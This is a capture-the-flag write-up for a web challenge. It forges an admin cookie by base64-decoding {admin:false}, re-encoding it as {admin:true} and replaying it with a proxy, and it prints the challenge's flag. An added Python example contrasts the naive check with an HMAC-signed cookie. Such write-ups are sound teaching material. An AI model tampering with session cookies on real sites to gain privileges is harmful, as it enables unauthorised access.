Version
| By | Version | Comment |
|---|---|---|
| noraj | 1.0 | Creation |
CTF
Description
If you could become admin you would get a flag. Link
Solution
- Launch the Firefox Element Inspector or the Firebug add-on and use the network analyser.
- See the request cookie: e2FkbWluOmZhbHNlfQ==
- Un-base64 it:

      echo -n "e2FkbWluOmZhbHNlfQ==" | base64 -d && echo ""
      {admin:false}

- Edit the cookie and change the value to {admin:true} in base64:

      echo -n "{admin:true}" | base64
      e2FkbWluOnRydWV9

- Send it again with a proxy tool like Burp, ZAP, or Tamper Data.
- And TADA! We get into the admin page:
Wow! You're an admin, maybe. Well anyway, here is your flag, ABCTF{don't_trust_th3_coooki3}
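
The challenge works because the server trusts a base64 value that the client can rewrite. As an added example (not the challenge's code and not part of the original write-up), the Python below puts that naive check beside a cookie carrying an HMAC-SHA256 tag; `SECRET_KEY`, the function names and the `base64.tag` cookie layout are assumptions made for the illustration.

```python
import base64
import hashlib
import hmac
import secrets
from typing import Optional

# Assumption: a server-side secret; generated here so the example runs offline.
SECRET_KEY = secrets.token_bytes(32)


def naive_is_admin(cookie: str) -> bool:
    """Vulnerable pattern from the write-up: trusts whatever the client sends."""
    try:
        return base64.b64decode(cookie, validate=True) == b"{admin:true}"
    except ValueError:
        return False


def issue_cookie(payload: bytes) -> str:
    """Return base64(payload) + '.' + hex HMAC-SHA256 tag over the payload."""
    tag = hmac.new(SECRET_KEY, payload, hashlib.sha256).hexdigest()
    return base64.b64encode(payload).decode() + "." + tag


def verify_cookie(cookie: str) -> Optional[bytes]:
    """Return the payload only if its tag verifies; None for anything else."""
    body, sep, tag = cookie.partition(".")
    if not sep:
        return None  # unsigned value, e.g. the bare base64 cookie shown above
    try:
        payload = base64.b64decode(body, validate=True)
    except ValueError:
        return None
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).hexdigest()
    # Constant-time comparison avoids leaking how much of the tag matched.
    if hmac.compare_digest(expected.encode(), tag.encode()):
        return payload
    return None


def signed_is_admin(cookie: str) -> bool:
    """Hardened check: the admin flag counts only if the server signed it."""
    return verify_cookie(cookie) == b"{admin:true}"
```

Keeping the admin flag in server-side session state and sending only an opaque session identifier removes the need to put it in the cookie at all.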